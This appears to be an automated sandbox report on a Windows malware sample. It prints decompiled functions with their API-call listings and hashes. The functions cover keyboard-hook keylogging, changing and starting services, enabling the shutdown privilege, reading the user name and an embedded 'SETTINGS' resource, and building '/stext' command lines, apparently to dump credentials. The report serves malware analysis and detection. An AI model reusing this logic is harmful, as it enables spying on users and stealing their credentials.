                                        • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                        • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E00411927(void* _a4, signed char _a20) {
                                        				short* _t6;
                                        				signed int _t9;
                                        				void* _t14;
                                        				short* _t17;
                                        				int _t19;
                                        				void* _t21;
                                        				void* _t22;
                                        
                                        				_t17 = 0;
                                        				_t6 = OpenSCManagerW(0, 0, 2);
                                        				_t22 = _t6;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t21 = OpenServiceW(_t22, _t6, 2);
                                        				if(_t21 != 0) {
                                        					_t19 =  &_a4 | 0xffffffff;
                                        					_t9 = _a20 & 0x000000ff;
                                        					if(_t9 == 0) {
                                        						_push(4);
                                        						goto L8;
                                        					} else {
                                        						_t14 = _t9 - 1;
                                        						if(_t14 == 0) {
                                        							_push(2);
                                        							goto L8;
                                        						} else {
                                        							if(_t14 == 1) {
                                        								_push(3);
                                        								L8:
                                        								_pop(_t19);
                                        							}
                                        						}
                                        					}
                                        					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                        					CloseServiceHandle(_t22);
                                        					CloseServiceHandle(_t21);
                                        				} else {
                                        					CloseServiceHandle(_t22);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t17;
			}

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                        • String ID:
                                        • API String ID: 760094045-0
                                        • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                        • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00411700(void* _a4) {
                                        				short* _t5;
                                        				signed int _t12;
                                        				void* _t15;
                                        				void* _t16;
                                        
                                        				_t12 = 0;
                                        				_t5 = OpenSCManagerW(0, 0, 0x10);
                                        				_t16 = _t5;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t15 = OpenServiceW(_t16, _t5, 0x10);
                                        				if(_t15 != 0) {
                                        					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
                                        					CloseServiceHandle(_t16);
                                        					CloseServiceHandle(_t15);
                                        				} else {
                                        					CloseServiceHandle(_t16);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t12;
                                        			}

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                        • String ID:
                                        • API String ID: 3595611540-0
                                        • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                        • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                        • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                        • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0040EC0F() {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				struct _TOKEN_PRIVILEGES _v24;
                                        				signed int _t14;
                                        
                                        				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                        				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                        				_v24.PrivilegeCount = 1;
                                        				_v12 = 2;
                                        				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                        				_t14 = GetLastError();
                                        				asm("sbb eax, eax");
                                        				return  ~( ~_t14);
                                        			}

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                        • GetLastError.KERNEL32 ref: 0040EC5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                        • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00412163(intOrPtr _a4) {
                                        				char _v5;
                                        				char _v12;
                                        				long _v16;
                                        				char _v32;
                                        				void* _v48;
                                        				char _v80;
                                        				short _v592;
                                        				char* _t23;
                                        				char* _t25;
                                        
                                        				_v12 = 0x10;
                                        				 *0x41c1e8(1,  &_v80,  &_v12);
                                        				_v16 = 0x100;
                                        				GetUserNameW( &_v592,  &_v16);
                                        				_t23 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                        				_t25 =  &_v32;
                                        				L0041416A();
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}

                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                        • String ID:
                                        • API String ID: 3382107156-0
                                        • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                        • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00409D02(void** _a4) {
                                        				void* _t4;
                                        				long _t5;
                                        				struct HRSRC__* _t7;
                                        
                                        				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                        				_t4 = LockResource(LoadResource(0, _t7));
                                        				_t5 = SizeofResource(0, _t7);
                                        				 *_a4 = _t4;
                                        				return _t5;
                                        			}

                                        APIs
                                        • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                        • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                        • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
                                        				void* _t19;
                                        				void* _t26;
                                        				struct HHOOK__** _t32;
                                        				signed int _t33;
                                        
                                        				_t32 = _a4;
                                        				_t33 = 5;
                                        				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
                                        				if(_a8 == 0) {
                                        					_t19 = _a12 - 0x100;
                                        					if(_t19 == 0) {
                                        						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
                                        							_t32[0xb] = _t32[0xb] & 0x00000000;
                                        						} else {
                                        							_t32[0xb] = 1;
                                        						}
                                        						E00406BA7(_t32);
                                        						E00406BCB(_t32);
                                        						E00405EB2(_t32);
                                        						if(_t32[0xb] == 0) {
                                        							E00406952(_t32);
                                        						}
                                        						_t32[0xb] = _t32[0xb] & 0x00000000;
                                        					} else {
                                        						_t26 = _t19 - 1;
                                        						if(_t26 == 0) {
                                        							E00406BB9(_t32);
                                        							E00406BDD(_t32);
                                        							E00406B61(_t32);
                                        						} else {
                                        							if(_t26 == 3) {
                                        								E00406AD1(_t32);
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return CallNextHookEx( *_t32, _a8, _a12, _a16);
                                        			}

                                        APIs
                                        • GetKeyState.USER32 ref: 00405381
                                        • GetKeyState.USER32 ref: 0040538A
                                          • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                        • CallNextHookEx.USER32 ref: 004053CD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                        • String ID:
                                        • API String ID: 98962008-0
                                        • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                        • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                        • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                        • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00409E7D(void* __ecx, intOrPtr _a4) {
                                        				char _v5;
                                        				char _v8;
                                        
                                        				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
                                        				return _a4;
                                        			}

                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                        • String ID:
                                        • API String ID: 4090406865-0
                                        • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                        • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                        • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                        • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405156(void* __ecx) {
                                        				signed int _t3;
                                        				signed int _t4;
                                        				intOrPtr _t6;
                                        				intOrPtr _t7;
                                        				void* _t8;
                                        
                                        				_t8 = __ecx;
                                        				_t3 = GetKeyboardLayout(0);
                                        				_t4 = _t3 & 0x000003ff;
                                        				_t6 = 9;
                                        				if(_t4 == _t6) {
                                        					L3:
                                        					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
                                        					return _t4;
                                        				} else {
                                        					_t7 = 0x10;
                                        					if(_t4 != _t7) {
                                        						goto L3;
                                        					} else {
                                        						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
                                        						return _t4;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayout
                                        • String ID:
                                        • API String ID: 194098044-0
                                        • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                        • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                        • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                        • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                        				intOrPtr _t6;
                                        				intOrPtr _t7;
                                        				intOrPtr* _t10;
                                        
                                        				_t10 = _a4;
                                        				_t6 = _a8;
                                        				asm("cpuid");
                                        				 *_t10 = _t6;
                                        				 *((intOrPtr*)(_t10 + 4)) = _t7;
                                        				 *((intOrPtr*)(_t10 + 8)) = 0;
                                        				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
                                        				return _t6;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                        • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                        • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                        • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                        • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
